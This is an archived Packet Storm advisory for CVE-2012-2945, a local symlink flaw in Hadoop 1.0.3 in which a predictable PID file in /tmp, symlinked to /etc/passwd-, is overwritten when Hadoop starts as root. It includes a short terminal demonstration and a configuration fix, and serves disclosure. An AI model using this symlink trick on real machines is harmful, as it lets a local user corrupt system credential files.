Lucene search
Simon .PACKETSTORM:114370HistoryJun 30, 2012 - 12:00 a.m.
Hadoop 1.0.3 Symlink
2012-06-3000:00:00
Simon .
packetstormsecurity.com
31
0.002 Low
EPSS
Percentile
54.5%
`Software : hadoop-1.0.3
Vulnerability : Symlink
Problem type : local
CVE ID : CVE-2012-2945
Date : May 28, 2012
Affected : min May 08, 2012
Symptom:
$ echo $JAVA_HOME
/usr/lib/jvm/java-7-openjdk
$ file /tmp/hadoop-root-tasktracker.pid
/tmp/hadoop-root-tasktracker.pid: symbolic link to `/etc/passwd-'
$ sh bin/start-all.sh
starting namenode, logging to
/home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-namenode-t0.out
root@localhost's password:
localhost: starting datanode, logging to
/home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-datanode-t0.out
root@localhost's password:
localhost: starting secondarynamenode, logging to
/home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-secondarynamenode-t0.out
starting jobtracker, logging to
/home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-jobtracker-t0.out
root@localhost's password:
localhost: starting tasktracker, logging to
/home/cloudopfer/src/hadoop-1.0.3/libexec/../logs/hadoop-root-tasktracker-t0.out
$ tail -1 /etc/passwd-
10544
Problem:
$ grep tmp src/hadoop-1.0.3/conf/hadoop-env.sh
# The directory where pid files are stored. /tmp by default.
as pointed out by CVE Team:
"Incidentally, it seems that in Hadoop 1.x, only the
HADOOP_PID_DIR setting is affected, but in Hadoop 2.x, both the
HADOOP_PID_DIR and HADOOP_SECURE_DN_PID_DIR settings might be
affected:
http://svn.apache.org/repos/asf/hadoop/common/branches/branch-2/hadoop-common-project/hadoop-common/src/main/conf/hadoop-env.sh
# The directory where pid files are stored. /tmp by default.
export HADOOP_PID_DIR=${HADOOP_PID_DIR}
export HADOOP_SECURE_DN_PID_DIR=${HADOOP_PID_DIR}
"
Solution:
Hadoop Cloud Specialists (lol) should edit conf/hadoop-env and change
the pid file directory to something sane.
Impact:
Low
Timeline:
May 25 - got drunk
May 26 - got drunk
May 27 - MARK -
May 28 - playing around with hadoop
- notified security@
- got reply, clarified things
Jul 01 - get rid of this ;)
Greetings:
To CVE Team!
To srm, Dude!
To the usual suspects
To those, who trust me.
To all who stay real.
Simon
.
`
Related
cve
cve
CVE-2012-2945
2019-10-29 19:15:13
cvelist
cvelist
CVE-2012-2945
2019-10-28 20:31:27
redhatcve
redhatcve
CVE-2012-2945
2019-11-21 15:07:28
osv
osv
Hadoop symlink vulnerability
2022-04-23 00:40:07
github
github
Hadoop symlink vulnerability
2022-04-23 00:40:07
prion
prion
Design/Logic Flaw
2019-10-29 19:15:00
nvd
nvd
CVE-2012-2945
2019-10-29 19:15:13